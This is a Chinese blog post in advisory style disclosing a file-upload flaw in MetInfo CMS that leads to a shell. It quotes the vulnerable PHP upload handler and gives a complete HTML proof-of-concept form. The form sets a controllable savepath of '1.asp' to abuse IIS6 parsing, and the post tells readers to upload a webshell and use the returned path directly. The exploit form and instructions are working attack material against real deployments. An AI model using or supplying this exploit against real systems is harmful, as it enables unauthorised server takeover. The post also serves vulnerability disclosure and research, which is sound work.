美文网首页
MetInfo 鸡肋getshell

MetInfo 鸡肋getshell

作者: 索马里的乌贼 | 来源:发表于2018-08-21 23:11 被阅读0次
  1. 发布时间:2017-01-02
  2. 公开时间:N/A
  3. 漏洞类型:文件上传
  4. 危害等级:高
  5. 漏洞编号:xianzhi-2017-01-73318655
  6. 测试版本:N/A

漏洞详情

app/system/include/module/uploadify.class.php 65行

public function doupfile(){
        global $M;
        $this->upfile->set_upfile();
        $info['savepath'] = $_M['form']['savepath'];
        $info['format'] = $_M['form']['format'];
        $info['maxsize'] = $_M['form']['maxsize'];
        $info['is_rename'] = $_M['form']['is_rename'];
        $info['is_overwrite'] = $_M['form']['is_overwrite'];
        $this->set_upload($info);
        $back = $this->upload($_M['form']['formname']);
        if($_M['form']['type']==1){
            if($back['error']){
                $back['error'] = $back['errorcode'];
            }else{
                $backs['path'] = $back['path'];
                $backs['append'] = 'false';
                $back = $backs;
            }
        }
        echo jsonencode($back);
    }

$_M['form']来自$(POST|GET|COOKIE)
savepath可控导致且当目录不存在时自动新建 导致IIS6下解析漏洞getshell

测试方法

<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype ="multipart/form-data"&gt;
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
<br />

选择一个后缀在上面列表中的马submit即可
返回带路径 直接用


view.png

相关文章

  • MetInfo 鸡肋getshell

    发布时间:2017-01-02 公开时间:N/A 漏洞类型:文件上传 危害等级:高 漏洞编号:xianzhi-20...

  • Ueditor php版鸡肋getshell

    发布时间:2017-10-13 公开时间:N/A 漏洞类型:文件操作 危害等级:低 漏洞编号:xianzhi-20...

  • MetInfo开发文档

    MetInfo应用开发文档 1. 开发准备 1.1 前言 MetInfo应用制作介绍MetInfo企业网站管理系统...

  • 2019-04-21 MetInfo 漏洞靶场实验

    实验原理 1.MetInfo 漏洞MetInfo 漏洞由于设计错误,导致远程攻击者访问 MentInfo 并利用漏...

  • DedeCMS-V5.7 前台鸡肋&后台getshell

    0x01 吹牛逼 官方下载最新安装包http://updatenew.dedecms.com/base-v57/p...

  • MetInfo 注入

    发布时间:2016-11-25 公开时间:N/A 漏洞类型:sql注入 危害等级:高 漏洞编号:xianzhi-2...

  • 2022-02-19

    鸡肋鸡肋

  • 网络安全审计之CMS代码审计

    0x00:环境说明 Windows 10PhpstubyPhp版本:7.2.9CMS版本:MetInfo7.5.0...

  • phpmyadmin getshell

    1.getshell条件 使用root账户登陆phpmyadmin 2.Mysql变量设置 1.general l...

  • bugku getshell

    这看题目应该是是多次绕过后文件上传 本来没什么思路,然后看了看大佬们的解题,说实话对于将multipart改成Mu...

网友评论

      本文标题:MetInfo 鸡肋getshell

      本文链接:https://www.haomeiwen.com/subject/dbbsiftx.html